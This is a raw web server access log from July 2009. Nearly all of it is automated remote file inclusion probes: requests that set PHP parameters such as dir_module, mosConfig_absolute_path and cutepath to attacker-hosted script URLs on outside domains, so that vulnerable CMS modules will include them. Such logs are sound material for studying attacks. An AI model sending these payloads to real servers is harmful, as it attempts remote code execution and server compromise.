220.231.126.252 - - [06/Jul/2009:04:23:37 -0400] "GET /logs/access_log.Q109051000%20%20//modules/xfsection/modify.php?dir_module=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
89.171.190.110 - - [06/Jul/2009:04:23:46 -0400] "GET /logs/access_log.Q109060200%20%20//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
85.17.162.28 - - [06/Jul/2009:04:23:51 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.firearts.org/events/_a? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
85.17.162.28 - - [06/Jul/2009:04:23:51 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.firearts.org/events/_a? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
85.17.162.28 - - [06/Jul/2009:04:23:51 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.firearts.org/events/_a? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.17.162.28 - - [06/Jul/2009:04:23:52 -0400] "GET /logs/access_log.Q109051700%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.firearts.org/events/_a? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
65.98.59.178 - - [06/Jul/2009:04:23:55 -0400] "GET /logs/access_log.Q109052300%20//classes/adodbt/sql.php?classes_dir=http://www.scd-lunjina.org/drquek//idv6.txt???? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
61.78.62.84 - - [06/Jul/2009:04:23:57 -0400] "GET /logs/show_news.php?cutepath=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:04:23:58 -0400] "GET /show_news.php?cutepath=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:04:23:58 -0400] "GET /logs/access_log.Q109060600/show_news.php?cutepath=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:04:24:02 -0400] "GET /logs/error_log.Q109051100%20%20//modules/xfsection/modify.php?dir_module=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:04:24:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.181.0.114 - - [06/Jul/2009:04:24:44 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://211.181.0.114/phpMyAdmin/lang/setup_lang.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
207.210.126.218 - - [06/Jul/2009:04:24:44 -0400] "GET /logs/errors.php?error=http://www.pinoy.ae/media/fx29id.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
207.210.126.218 - - [06/Jul/2009:04:24:44 -0400] "GET /errors.php?error=http://www.pinoy.ae/media/fx29id.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
207.210.126.218 - - [06/Jul/2009:04:24:44 -0400] "GET /logs/access_log.Q109061700%20%20/errors.php?error=http://www.pinoy.ae/media/fx29id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.181.0.114 - - [06/Jul/2009:04:24:45 -0400] "GET //index.php?DOCUMENT_ROOT=http://211.181.0.114/phpMyAdmin/lang/setup_lang.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
207.210.126.218 - - [06/Jul/2009:04:24:45 -0400] "GET /logs/access_log.Q109051000%20%20/errors.php?error=http://www.pinoy.ae/media/fx29id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
210.219.173.86 - - [06/Jul/2009:04:24:46 -0400] "GET /logs/access_log.Q109061200///?_SERVER[DOCUMENT_ROOT]=http://www.yeojuspa.co.kr/board/readme.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
210.219.173.86 - - [06/Jul/2009:04:24:47 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.yeojuspa.co.kr/board/readme.txt??? HTTP/1.1" 200 453 "-" "libwww-perl/5.79"
211.181.0.114 - - [06/Jul/2009:04:24:48 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://211.181.0.114/phpMyAdmin/lang/setup_lang.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.65"
210.219.173.86 - - [06/Jul/2009:04:24:48 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.yeojuspa.co.kr/board/readme.txt??? HTTP/1.1" 200 8392 "-" "libwww-perl/5.79"
211.181.0.114 - - [06/Jul/2009:04:24:56 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://211.181.0.114/phpMyAdmin/lang/setup_lang.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
195.34.78.110 - - [06/Jul/2009:04:25:36 -0400] "GET //modules/xfsection/modify.php?dir_module=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:25:36 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:25:37 -0400] "GET /logs/access_log.Q109051000%20%20//modules/xfsection/modify.php?dir_module=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
85.17.162.28 - - [06/Jul/2009:04:25:53 -0400] "GET /logs/access_log.Q109063000//include/print_category.php?setup[use_category]=1&dir=http://www.firearts.org/events/cfg%0D? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
85.17.162.28 - - [06/Jul/2009:04:25:53 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.firearts.org/events/cfg%0D? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
85.17.162.28 - - [06/Jul/2009:04:25:53 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.firearts.org/events/cfg%0D? HTTP/1.1" 404 230 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
85.17.162.28 - - [06/Jul/2009:04:25:55 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.firearts.org/events/cfg%0D? HTTP/1.1" 404 230 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
85.17.162.28 - - [06/Jul/2009:04:25:55 -0400] "GET /logs/access_log.Q109063000//include/print_category.php?setup[use_category]=1&dir=http://www.firearts.org/events/cfg%0D? HTTP/1.1" 404 252 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
85.17.162.28 - - [06/Jul/2009:04:25:55 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.firearts.org/events/cfg%0D? HTTP/1.1" 404 225 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
66.232.143.238 - - [06/Jul/2009:04:26:15 -0400] "GET /logs/access_log.Q109052100/index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
66.232.143.238 - - [06/Jul/2009:04:26:16 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
66.232.143.238 - - [06/Jul/2009:04:26:16 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
207.210.126.218 - - [06/Jul/2009:04:26:42 -0400] "GET /errors.php?error=http://www.pinoy.ae/media/fx29id.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
207.210.126.218 - - [06/Jul/2009:04:26:42 -0400] "GET /logs/access_log.Q109061700%20%20/errors.php?error=http://www.pinoy.ae/media/fx29id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
207.210.126.218 - - [06/Jul/2009:04:26:42 -0400] "GET /logs/errors.php?error=http://www.pinoy.ae/media/fx29id.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
207.210.126.218 - - [06/Jul/2009:04:26:42 -0400] "GET /logs/access_log.Q109051000%20%20/errors.php?error=http://www.pinoy.ae/media/fx29id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
210.200.170.28 - - [06/Jul/2009:04:26:54 -0400] "GET /logs/access_log.Q109051500//modules/xfsection/modify.php?dir_module=http://www.saerohands.com/mall/admin/echo.txt???? HTTP/1.1" 404 254 "-" "libwww-perl/5.803"
210.200.170.28 - - [06/Jul/2009:04:26:55 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.saerohands.com/mall/admin/echo.txt???? HTTP/1.1" 404 227 "-" "libwww-perl/5.803"
210.200.170.28 - - [06/Jul/2009:04:26:56 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.saerohands.com/mall/admin/echo.txt???? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
85.17.162.28 - - [06/Jul/2009:04:27:43 -0400] "GET /logs/access_log.Q109051500//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.firearts.org/events/_a? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.17.162.28 - - [06/Jul/2009:04:27:44 -0400] "GET /logs/access_log.Q109051700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.firearts.org/events/_a? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:04:27:45 -0400] "GET /logs/access_log.Q109051300%20//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
218.246.20.221 - - [06/Jul/2009:04:27:52 -0400] "GET /logs/error_log.Q109051400%20//modules/xfsection/modify.php?dir_module=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
218.246.20.221 - - [06/Jul/2009:04:27:53 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
218.246.20.221 - - [06/Jul/2009:04:27:53 -0400] "GET //modules/xfsection/modify.php?dir_module=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
200.226.134.29 - - [06/Jul/2009:04:28:56 -0400] "GET /logs/access_log.Q109061700//vwar/backup/errors.php?error=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.803"
200.226.134.29 - - [06/Jul/2009:04:28:56 -0400] "GET /logs/access_log.Q109061700//vwar/backup/errors.php?error=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.803"
200.226.134.29 - - [06/Jul/2009:04:28:56 -0400] "GET //vwar/backup/errors.php?error=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 221 "-" "libwww-perl/5.803"
200.226.134.29 - - [06/Jul/2009:04:28:56 -0400] "GET //vwar/backup/errors.php?error=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 221 "-" "libwww-perl/5.803"
200.226.134.29 - - [06/Jul/2009:04:28:56 -0400] "GET /logs//vwar/backup/errors.php?error=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
200.226.134.29 - - [06/Jul/2009:04:28:56 -0400] "GET /logs//vwar/backup/errors.php?error=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
209.59.12.99 - - [06/Jul/2009:04:29:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
61.78.62.84 - - [06/Jul/2009:04:29:13 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:04:29:13 -0400] "GET //skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:04:29:15 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
200.226.134.29 - - [06/Jul/2009:04:29:15 -0400] "GET /logs/access_log.Q109051000//vwar/backup/errors.php?error=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.803"
200.226.134.29 - - [06/Jul/2009:04:29:18 -0400] "GET /logs/access_log.Q109051000//vwar/backup/errors.php?error=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.803"
218.249.36.194 - - [06/Jul/2009:04:29:38 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:04:29:38 -0400] "GET /logs/access_log.Q109051500%20%20//modules/xfsection/modify.php?dir_module=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:04:29:38 -0400] "GET //modules/xfsection/modify.php?dir_module=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
84.51.241.6 - - [06/Jul/2009:04:29:58 -0400] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.yaco-online.com.br/mambots/perkosa.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
84.51.241.6 - - [06/Jul/2009:04:29:58 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://www.yaco-online.com.br/mambots/perkosa.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
84.51.241.6 - - [06/Jul/2009:04:29:58 -0400] "GET /logs/error_log.Q109060700//bemarket/postscript/postscript.php?p_mode=http://www.yaco-online.com.br/mambots/perkosa.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
218.249.36.194 - - [06/Jul/2009:04:30:04 -0400] "GET /logs/access_log.Q109051000%20%20//modules/xfsection/modify.php?dir_module=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
202.174.82.220 - - [06/Jul/2009:04:30:11 -0400] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.yaco-online.com.br/mambots/tukulid.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
84.51.241.6 - - [06/Jul/2009:04:30:13 -0400] "GET /logs/error_log.Q109060700//bemarket/postscript/postscript.php?p_mode=http://www.yaco-online.com.br/mambots/perkosa.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
84.51.241.6 - - [06/Jul/2009:04:30:13 -0400] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.yaco-online.com.br/mambots/perkosa.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
84.51.241.6 - - [06/Jul/2009:04:30:14 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://www.yaco-online.com.br/mambots/perkosa.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
202.174.82.220 - - [06/Jul/2009:04:30:30 -0400] "GET /logs/access_log.Q109051100//modules/My_eGallery/public/displayCategory.php?basepath=http://www.yaco-online.com.br/mambots/tukulid.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
202.174.82.220 - - [06/Jul/2009:04:30:30 -0400] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.yaco-online.com.br/mambots/tukulid.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
61.109.245.179 - - [06/Jul/2009:04:30:47 -0400] "GET //authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
61.109.245.179 - - [06/Jul/2009:04:30:47 -0400] "GET /logs/access_log.Q109060300//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
61.109.245.179 - - [06/Jul/2009:04:30:47 -0400] "GET /logs//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
61.109.245.179 - - [06/Jul/2009:04:30:51 -0400] "GET /logs/access_log.Q109060300//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
61.109.245.179 - - [06/Jul/2009:04:30:51 -0400] "GET /logs//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
61.109.245.179 - - [06/Jul/2009:04:30:51 -0400] "GET //authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
195.34.78.110 - - [06/Jul/2009:04:30:55 -0400] "GET /logs/access_log.Q109051500//modules/xfsection/modify.php?dir_module=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:31:08 -0400] "GET /logs/access_log.Q109051000//modules/xfsection/modify.php?dir_module=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
85.17.162.28 - - [06/Jul/2009:04:32:14 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.firearts.org/events/_a? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
85.17.162.28 - - [06/Jul/2009:04:32:14 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.firearts.org/events/_a? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
85.17.162.28 - - [06/Jul/2009:04:32:14 -0400] "GET /logs/access_log.Q109063000//include/print_category.php?setup[use_category]=1&dir=http://www.firearts.org/events/_a? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:04:32:20 -0400] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:04:32:20 -0400] "GET //components/com_smf/smf.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:04:32:20 -0400] "GET /logs/access_log.Q109060300//components/com_smf/smf.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:04:32:20 -0400] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:04:32:20 -0400] "GET //components/com_smf/smf.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:04:32:20 -0400] "GET /logs/access_log.Q109060300//components/com_smf/smf.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
202.174.82.220 - - [06/Jul/2009:04:33:11 -0400] "GET /logs/access_log.Q109052500//modules/My_eGallery/public/displayCategory.php?basepath=http://www.yaco-online.com.br/mambots/tukulid.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
59.120.3.108 - - [06/Jul/2009:04:33:12 -0400] "GET /logs/access_log.Q109051000//modules/xfsection/modify.php?dir_module=http://www.saerohands.com/mall/admin/echo.txt???? HTTP/1.1" 404 254 "-" "libwww-perl/5.803"
195.34.78.110 - - [06/Jul/2009:04:33:40 -0400] "GET /logs/access_log.Q109051500//modules/xfsection/modify.php?dir_module=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:33:56 -0400] "GET /logs/access_log.Q109051000//modules/xfsection/modify.php?dir_module=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
85.17.162.28 - - [06/Jul/2009:04:33:59 -0400] "GET /logs/access_log.Q109051500//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.firearts.org/events/_a? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.17.162.28 - - [06/Jul/2009:04:33:59 -0400] "GET /logs/access_log.Q109051700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.firearts.org/events/_a? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:04:34:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.92.85.176 - - [06/Jul/2009:04:34:24 -0400] "GET /logs/access_log.Q109052200%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
213.92.85.176 - - [06/Jul/2009:04:34:33 -0400] "GET /logs/access_log.Q109051100%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
72.30.65.36 - - [06/Jul/2009:04:34:41 -0400] "GET /logs/access_log.Q108081300 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.68.70 - - [06/Jul/2009:04:35:17 -0400] "GET /images/items/0033138_thumb.jpg HTTP/1.1" 200 3106 "-" "Googlebot-Image/1.0"
211.115.213.35 - - [06/Jul/2009:04:35:21 -0400] "GET /logs/access_log.Q109053000%20%20//logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:04:35:52 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:04:35:53 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:04:35:54 -0400] "GET /logs/access_log.Q109062400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
218.246.20.221 - - [06/Jul/2009:04:37:16 -0400] "GET /logs/access_log.Q109052100//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
218.246.20.221 - - [06/Jul/2009:04:37:17 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
218.246.20.221 - - [06/Jul/2009:04:37:18 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
61.78.62.84 - - [06/Jul/2009:04:37:23 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:04:37:23 -0400] "GET /logs/access_log.Q109062400%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:04:37:24 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
218.246.20.221 - - [06/Jul/2009:04:37:44 -0400] "GET /logs/access_log.Q109051500//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
209.51.133.202 - - [06/Jul/2009:04:38:19 -0400] "GET //modules/errors.php?error=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:04:38:19 -0400] "GET /logs//modules/errors.php?error=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:04:38:19 -0400] "GET /logs/access_log.Q109053100%20%20//modules/errors.php?error=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:04:38:25 -0400] "GET /logs/access_log.Q109061200%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:04:39:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.124.127.34 - - [06/Jul/2009:04:39:34 -0400] "GET //appserv/main.php?appserv_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
121.124.127.34 - - [06/Jul/2009:04:39:34 -0400] "GET /logs//appserv/main.php?appserv_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
121.124.127.34 - - [06/Jul/2009:04:39:34 -0400] "GET /logs/access_log.Q109051800//appserv/main.php?appserv_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
66.232.143.238 - - [06/Jul/2009:04:39:56 -0400] "GET /logs/access_log.Q109051500/index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
